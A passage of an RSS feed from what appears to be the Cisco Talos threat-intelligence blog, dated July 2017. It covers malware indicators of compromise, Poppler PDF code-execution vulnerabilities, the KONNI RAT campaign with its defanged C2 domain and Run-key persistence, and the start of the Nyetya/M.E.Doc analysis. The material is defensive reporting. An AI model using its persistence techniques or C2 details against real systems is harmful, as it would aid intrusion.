&lt;/b&gt;c4f40c367320fcdc570a23c70d18a343&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;c4f40c367320fcdc570a23c70d18a343&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\c4f40c367320fcdc570a23c70d18a343.exe&lt;/li&gt;&lt;li&gt;%SystemDrive%\Documents and Settings\Administrator\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%AppData%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs&lt;/li&gt;&lt;li&gt;%TEMP%\IXP000.TMP\1.xyz&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-0lqSlixFz6w/WRNEvDBYhOI/AAAAAAAAA8g/ipzkzUpN9Ioo6QWiDDftf95zMLP66gt9QCLcB/s1600/amp-threatgrid-proxy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://2.bp.blogspot.com/-0lqSlixFz6w/WRNEvDBYhOI/AAAAAAAAA8g/ipzkzUpN9Ioo6QWiDDftf95zMLP66gt9QCLcB/s1600/amp-threatgrid-proxy.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-6ddqqWSTkzc/WV-r1bwxTFI/AAAAAAAAAUE/-NiX4lWceiclvu8OaB0f3vhl9P161c1EQCLcBGAs/s1600/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481"
data-original-width="702" height="218" src="https://1.bp.blogspot.com/-6ddqqWSTkzc/WV-r1bwxTFI/AAAAAAAAAUE/-NiX4lWceiclvu8OaB0f3vhl9P161c1EQCLcBGAs/s320/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-cJgShVMw9CA/WV-r5vI9PHI/AAAAAAAAAUI/2vnRnsWxkX0QVPzOMYUyxWlSKABUBy3XgCLcBGAs/s1600/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1101" data-original-width="1237" height="568" src="https://3.bp.blogspot.com/-cJgShVMw9CA/WV-r5vI9PHI/AAAAAAAAAUI/2vnRnsWxkX0QVPzOMYUyxWlSKABUBy3XgCLcBGAs/s640/7f7811f54a31936ac15ee95d8839d763ada89ff3a80aa7479c7ea670b1a382c5_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Siggen-6261194-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\SERVICES\MPSSVC\PARAMETERS\PORTKEYWORDS\DHCP&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;Collection&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Local\MSCTF.Asm.MutexDefault1&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;13[.]65[.]245[.]138&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;time[.]windows[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;\TEMP\filename.exe&lt;/li&gt;&lt;li&gt;%System32%\wdi\{ffc42108-4920-4acf-a4fc-8abdcc68ada4}\{debd4f12-5573-4e21-a11a-2adccd61a055}\snapshot.etl&lt;/li&gt;&lt;li&gt;%System32%\wdi\LogFiles\WdiContextLog.etl.001&lt;/li&gt;&lt;li&gt;%System32%\wdi\{533a67eb-9fb5-473d-b884-958cf4b9c4a3}\{bc3d8877-b46d-4746-b041-b538af5e2cf0}\snapshot.etl&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;b4a615cd2cc1299da98059f2164e69d4b20fcd4179acd672153e6533b9c95709&lt;/li&gt;&lt;li&gt;f59c0ffee54d23875a039b546a1827c3bc40c45aee5a4887e6c8515e96d4169f&lt;/li&gt;&lt;li&gt;e38d7a959a6957ae51733a4f8b28e7514c4f1cbb5faf2f6314d7b17c69eef155&lt;/li&gt;&lt;li&gt;b3cd047683dc8944c9d9765d2e73c25c5ac1b7bba39f6b4ff748849b9a3d091b&lt;/li&gt;&lt;li&gt;4bcadb728a4948f945738f4d704c3f63525952ce8e6894aa6634de6e33a0d961&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-kjhq22zzOoQ/WV-sHyh75eI/AAAAAAAAAUM/Pers_f-TNSU4sFUUgACnOO9DU9DWo6ruACLcBGAs/s1600/Win_Trojan_Siggen_6261194_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" 
data-original-height="408" data-original-width="606" height="215" src="https://2.bp.blogspot.com/-kjhq22zzOoQ/WV-sHyh75eI/AAAAAAAAAUM/Pers_f-TNSU4sFUUgACnOO9DU9DWo6ruACLcBGAs/s320/Win_Trojan_Siggen_6261194_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-9aiYbUSqGH8/WV-sRKx0mZI/AAAAAAAAAUQ/OcrW9XPKKtQJ-JcUUqNE5u2wvbBtjJlZwCLcBGAs/s1600/Win_Trojan_Siggen_6261194_0_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="372" data-original-width="1600" height="148" src="https://2.bp.blogspot.com/-9aiYbUSqGH8/WV-sRKx0mZI/AAAAAAAAAUQ/OcrW9XPKKtQJ-JcUUqNE5u2wvbBtjJlZwCLcBGAs/s640/Win_Trojan_Siggen_6261194_0_tg.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=AyMUnI59ekI:_2GvhsnwHt8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/AyMUnI59ekI" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T12:30:39.115-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://1.bp.blogspot.com/-Eas_0o48AY8/WOf0Ghq59bI/AAAAAAAAAyo/KBeOsopaYkUQ67bPqp3x5EUBpiJaGjx6gCLcB/s72-c/no-netsec-proxy.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/threat-roundup-0630-0707.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: TALOS-2017-0311,0319,0321 - Multiple Remote Code Execution Vulnerability in Poppler PDF library</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/Epb7zux15g4/vulnerability-spotlight-talos-2017.html</link><author>noreply@blogger.com (Holger Unterbrink)</author><pubDate>Fri, 07 Jul 2017 08:27:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-44483046434571940</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;Vulnerability discovered by Marcin Noga, Lilith Wyatt and Aleksandar Nikolic of Cisco Talos.&lt;br /&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Overview&lt;/h3&gt;Talos has discovered multiple vulnerabilities in the freedesktop.org Poppler PDF library. Exploiting these vulnerabilities can allow an attacker to gain full control over the victim's machine. If an attacker builds a specially crafted PDF document and the victim opens it, the attackers code will be executed with the privileges of the local user. &lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Details&lt;/h3&gt;&lt;div style="text-align: left;"&gt;Poppler is a shared library for displaying PDF files, used as middleware within different enterprise and open source solutions (e.g. Gimp). 
It is a fork of XPDF and is a complete implementation of the PDF ISO standard. Talos identified three remote code execution vulnerabilities in the Poppler library.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0311 / CVE-2017-2814&lt;/b&gt; - Poppler PDF Image Display DCTStream::readScan() Code Execution Vulnerability&lt;br /&gt;&lt;br /&gt;An exploitable heap overflow vulnerability exists in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an image to be resized after its buffer has already been allocated, resulting in a heap corruption triggered in the DCTStream::readScan() function. This can lead to code execution with the rights of the local user.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0319 / CVE-2017-2818&lt;/b&gt; - Poppler PDF Image Display DCTStream::readProgressiveSOF() Code Execution Vulnerability&lt;br /&gt;&lt;br /&gt;Talos found an exploitable heap overflow vulnerability in the image rendering functionality of Poppler-0.53.0. A specifically crafted PDF can cause an overly large number of color components during image rendering, resulting in a heap corruption. This can be used by an attacker to craft a PDF file that executes malicious code on the victim's computer with the rights of the local user.&lt;br /&gt;&lt;br /&gt;This vulnerability was previously found (CVE-2005-3627) and a fix was applied to DCTStream::readBaselineSOF; however, the same bug was missed in the readProgressiveSOF function.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;TALOS-2017-0321 / CVE-2017-2820 - &lt;/b&gt;&lt;span id="summary_alias_container"&gt;&lt;span id="short_desc_nonedit_display"&gt;Poppler PDF library JPEG2000 levels Code Execution Vulnerability&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;Talos discovered an exploitable integer overflow vulnerability in the JPEG 2000 image parsing functionality of the Poppler 0.53.0 library. 
An attacker can build a specially crafted PDF file that uses this bug to trigger an integer overflow. Later in the code execution flow, this can lead to memory on the heap being overwritten, resulting in potential arbitrary code execution with the rights of the local user. As with the other two vulnerabilities, a victim must open the malicious PDF in an application that uses this library for the vulnerability to be exploited. One example of a vulnerable application is the default PDF reader Evince, shipped with the latest version of Ubuntu Linux. &lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;h3 style="text-align: left;"&gt;Additional Notes&lt;/h3&gt;We would like to highlight that TALOS-2017-0311 and TALOS-2017-0321 are in Poppler's internal, unmaintained JPEG and JPEG2000 decoders, which should never be used. Even Poppler's documentation strongly suggests not using them. It is highly recommended to build the Poppler library with more robust and up-to-date external implementations such as libjpeg and openjpeg. However, Ubuntu does not do this by default for JPEG2000 and will use the unmaintained code, thus making Ubuntu-compiled versions vulnerable to these issues.&lt;br /&gt;&lt;br /&gt;Talos is seeing client-side attacks based on malicious PDF files on a daily basis. If your company is using a Poppler-based application, it is possible that an attacker could use one of these vulnerabilities against it in a targeted attack. 
This shows how important it is to keep all applications up to date and not only the operating system.&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;More technical details can be found in the Talos Vulnerability Reports:&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0311"&gt;TALOS-2017-0311&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0319"&gt;TALOS-2017-0319&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;a href="http://www.talosintelligence.com/reports/TALOS-2017-0321"&gt;TALOS-2017-0321&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Coverage&lt;/h3&gt;&lt;div style="text-align: left;"&gt;The following Snort rules will detect exploitation attempts of these vulnerabilities. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort rules: 42273-42274, 42319-42320, 42352-42353&lt;/div&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-07T11:27:54.735-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/vulnerability-spotlight-talos-2017.html</feedburner:origLink></item><item><title>New KONNI Campaign References North Korean Missile Capabilities</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/GZVq9S5Btyo/konni-references-north-korean-missile-capabilities.html</link><category>APT</category><category>KONNI</category><category>Korea</category><category>Malware</category><category>Malware Analysis</category><category>RAT</category><author>noreply@blogger.com (Paul Rascagneres)</author><pubDate>Thu, 06 Jul 2017 00:58:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-8430048326002065342</guid><description>This blog was authored by &lt;a href="https://www.blogger.com/profile/10073079939160046441"&gt;Paul Rascagneres&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.nkgrhhxwl5h8"&gt;Executive Summary&lt;/h3&gt;&lt;br /&gt;We recently wrote about the &lt;a href="http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html"&gt;KONNI Remote Access Trojan&lt;/a&gt; (RAT) which has been distributed by a small number of campaigns over the past 3 years. We have identified a new distribution campaign which took place on 4th July. 
The malware used in this campaign has similar features to that distributed earlier in 2017 with the following changes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;A new decoy document copied and pasted from an article published on the 3rd of July by &lt;a href="http://english.yonhapnews.co.kr/news/2017/07/03/0200000000AEN20170703005100315.html"&gt;Yonhap News Agency&lt;/a&gt; in Korea;&lt;/li&gt;&lt;li&gt;The dropper includes a 64-bit version of KONNI;&lt;/li&gt;&lt;li&gt;A new CnC infrastructure consisting of a climbing club website.&lt;/li&gt;&lt;/ul&gt;North Korea conducted a test missile launch on 3rd July. This campaign appears to be directly related to the launch and the ensuing discussion of North Korean missile technology. This is consistent with previous KONNI distribution campaigns which have also frequently mentioned North Korea.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3 id="h.vzxos1cq0nxj"&gt;"N.K. marks anniversary of strategic force, touting missile capabilities" campaign&lt;/h3&gt;&lt;br /&gt;We identified an executable file with SHA-256 hash 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90 which, when opened, displays the following Office document:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="743" data-original-width="1117" height="424" src="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;The content of the document is copied and pasted from an article published on July 3rd by &lt;a href="http://english.yonhapnews.co.kr/news/2017/07/03/0200000000AEN20170703005100315.html"&gt;Yonhap News Agency&lt;/a&gt; in Korea. 
In addition to displaying this document, the malicious executable also drops 2 different versions of KONNI:&lt;br /&gt;&lt;pre&gt;C:\Users\Users\AppData\Local\MFAData\event\eventlog.dll (64 bit)&lt;br /&gt;C:\Users\Users\AppData\Local\MFAData\event\errorevent.dll (32 bit)&lt;br /&gt;&lt;/pre&gt;On 64-bit versions of Windows, both files are dropped; on 32-bit versions of Windows, only errorevent.dll, the 32-bit version, is dropped. Unlike previous campaigns, both binaries are packed with ASPack. In both cases, the dropped malware is immediately executed via rundll32.exe, with one of the following registry keys created to ensure that the malware persists and is executed on rebooting the compromised system:&lt;br /&gt;&lt;pre&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCPE&lt;br /&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RTHDVCP&lt;br /&gt;&lt;/pre&gt;This attack uses a new Command &amp;amp; Control infrastructure hosted on the following domain:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;member-daumchk[.]netai[.]net&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;The CnC traffic of KONNI takes place as HTTP POST requests to web pages hosted as /weget/download.php, /weget/uploadtm.php or /weget/upload.php on the domain itself.&lt;br /&gt;&lt;br /&gt;The attackers have gone to some effort to disguise the website as a legitimate climbing club.&lt;br /&gt;&lt;br /&gt;Here is a screenshot of the website:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-ipfz-ZYGkqI/WV3XSYLUnTI/AAAAAAAAAJI/CJf2R3Hvo6k7V01ZRLZQgBgi_np5JQlhQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="798" data-original-width="1262" height="403" src="https://2.bp.blogspot.com/-ipfz-ZYGkqI/WV3XSYLUnTI/AAAAAAAAAJI/CJf2R3Hvo6k7V01ZRLZQgBgi_np5JQlhQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;However, the website does 
not contain real text, only the default text of the Content Management System (CMS).&lt;br /&gt;&lt;br /&gt;Additionally, the website contains a contacts section with an address in the USA, but the map below the address is in Korean and points to a location in Seoul, South Korea:&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-5s8wIm7-EUY/WV3Xah1pEhI/AAAAAAAAAJM/iHaL9iBqq2YyDG5DSY0JIxLTbEf0no-sgCLcBGAs/s1600/image2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1202" data-original-width="1600" height="480" src="https://1.bp.blogspot.com/-5s8wIm7-EUY/WV3Xah1pEhI/AAAAAAAAAJM/iHaL9iBqq2YyDG5DSY0JIxLTbEf0no-sgCLcBGAs/s640/image2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 id="h.fnfv7rj9c1jx"&gt;Conclusion&lt;/h3&gt;&lt;br /&gt;The KONNI malware distributed as part of this campaign is similar to previous versions that we have identified this year. The attackers have added a 64-bit version and used a packer to complicate analysis. This campaign is directly related to current events and is clearly 'fresh': the binary was compiled on July 4th, and the decoy document was published on July 3rd.&lt;br /&gt;&lt;br /&gt;The threat actors associated with KONNI typically use decoy documents relating to North Korea, and this campaign is no exception. However, in contrast to the convincing decoy document lifted from a third party, the content of the decoy website hosted on the CnC server does not look legitimate. The text content is not consistent with the website navigation, and the contacts page contains a mismatch of a US address with a Korean map.&lt;br /&gt;&lt;br /&gt;Nevertheless, this threat actor remains active and continues to develop updated versions of their malware. 
Organisations which may have an interest in the contents of this decoy document, or in those used in previous campaigns, should ensure that they are adequately protected against this and subsequent campaigns.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.djrmnj5u9hb0"&gt;Coverage&lt;/h3&gt;&lt;br /&gt;Additional ways our customers can detect and block this threat are listed below.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VBEcK350naE/WV3XgfMyLjI/AAAAAAAAAJQ/Ycf4KrzzH7UUXmPSgZ8BjaZp8YNlz2ZSQCLcBGAs/s1600/image1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="239" data-original-width="320" src="https://4.bp.blogspot.com/-VBEcK350naE/WV3XgfMyLjI/AAAAAAAAAJQ/Ycf4KrzzH7UUXmPSgZ8BjaZp8YNlz2ZSQCLcBGAs/s1600/image1.png" /&gt;&lt;/a&gt;&lt;/div&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt; or &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt; web scanning prevents access to malicious websites and detects malware used in these attacks.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html"&gt;Email Security&lt;/a&gt; can block malicious emails sent by threat actors as part of their campaign.&lt;br /&gt;&lt;br /&gt;The Network Security protection of &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;IPS&lt;/a&gt; and &lt;a 
href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt; have up-to-date signatures to detect malicious network activity by threat actors.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt;, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.&lt;br /&gt;&lt;br /&gt;&lt;h3 id="h.1i2a6hyg44po"&gt;IOC&lt;/h3&gt;&lt;h4 id="h.yvcs2iexanix"&gt;File hashes&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;Dropper: 33f828ad462c414b149f14f16615ce25bd078630eee36ad953950e0da2e2cc90&lt;/li&gt;&lt;li&gt;32-bit binary: 290b1e2415f88fc3dd1d53db3ba90c4a760cf645526c8240af650751b1652b8a&lt;/li&gt;&lt;li&gt;64-bit binary: 8aef427aba54581f9c3dc923d8464a92b2d4e83cdf0fd6ace00e8035ee2936ad&lt;/li&gt;&lt;/ul&gt;&lt;h4 id="h.3m2ba6uxcylz"&gt;Network&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;member-daumchk[.]netai[.]net&lt;/li&gt;&lt;/ul&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-06T10:19:13.522-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-82_5hKivejo/WV3W_IpsSJI/AAAAAAAAAJE/IX_3APJpsjMuk8GitdpUQE4Lc4Hk669WQCLcBGAs/s72-c/image3.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html</feedburner:origLink></item><item><title>The MeDoc Connection</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/xX_tCOnymFk/the-medoc-connection.html</link><category>APT</category><category>ransomware</category><category>wiper</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Wed, 05 Jul 2017 11:22:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6684040042737345889</guid><description>&lt;i&gt;This post was authored by &lt;a href="https://twitter.com/dave_maynor"&gt;David Maynor&lt;/a&gt;, Aleksandar Nikolic, &lt;a href="https://twitter.com/kpyke"&gt;Matt Olney&lt;/a&gt;, and &lt;a href="http://fort-knox.org/"&gt;Yves Younan&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;h3&gt;Summary&lt;/h3&gt;&lt;div&gt;The Nyetya attack was a destructive ransomware variant that affected many organizations inside of Ukraine and multinational corporations with operations in Ukraine. In cooperation with Cisco Advanced Services Incident Response, Talos identified several key aspects of the attack. The investigation found a supply-chain-focused attack at M.E.Doc software that delivered a destructive payload disguised as ransomware. By utilizing stolen credentials, the actor was able to manipulate the update server for M.E.Doc to proxy connections to an actor-controlled server. 
Based on the findings, Talos remains confident that the attack was destructive in nature. The effects were broad-reaching, with the Ukrainian Cyber Police confirming over 2000 affected companies in Ukraine alone.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;h3&gt;Details&lt;/h3&gt;For Talos, June 27th, 2017, started with a message from our intelligence partners in Ukraine. &amp;nbsp;A massive ransomware attack was underway, and they were asking for help. &amp;nbsp;An organized attacker had the means to deliver arbitrary code to users of the most popular accounting software in Ukraine, and that includes multinational corporations that do business there. &amp;nbsp;The actor in question chose to use this capability to encrypt critical files and hard drives, with no way to decrypt them.&lt;br /&gt;&lt;br /&gt;Since the BlackEnergy attacks of late 2015, Talos has worked with public and private organizations in Ukraine to respond to attacks in the region. &amp;nbsp;Once already this year, Talos has assisted organizations targeted by actors with destructive intent. &amp;nbsp;Interestingly, in those cases a wiper very similar to prior BlackEnergy malware was deployed and, when that was blocked by our Advanced Malware Protection (AMP) product, the actor fell back to using a ransomware variant in an attempt to disrupt the organization’s activities. 
